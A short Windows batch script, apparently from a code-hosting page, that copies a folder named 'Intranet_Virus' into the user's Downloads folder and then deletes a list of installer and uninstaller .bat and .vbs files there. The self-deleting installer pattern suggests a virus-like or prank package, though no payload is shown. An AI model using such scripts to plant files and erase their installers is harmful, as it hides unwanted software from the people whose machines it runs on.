14 lines
No EOL
654 B
Batchfile
Executable file
14 lines
No EOL
654 B
Batchfile
Executable file
xcopy /s /z /y "Intranet_Virus" "%userprofile%\Downloads\"
|
|
timeout /t 5
|
|
del /s %userprofile%\Downloads\installer.bat
|
|
del /s %userprofile%\Downloads\installer.vbs
|
|
del /s %userprofile%\Downloads\installer_msg.vbs
|
|
del /s %userprofile%\Downloads\uninstall.vbs
|
|
del /s %userprofile%\Downloads\uninstall.bat
|
|
del /s %userprofile%\Downloads\uninstaller_one.vbs
|
|
del /s %userprofile%\Downloads\uninstaller_msg.vbs
|
|
del /s %userprofile%\Downloads\task_deleter.bat
|
|
del /s %userprofile%\Downloads\uninstall2.vbs
|
|
del /s %userprofile%\Downloads\installer_one.vbs
|
|
del /s %userprofile%\Downloads\installer_task.bat
|
|
del /s %userprofile%\Downloads\installer2.vbs |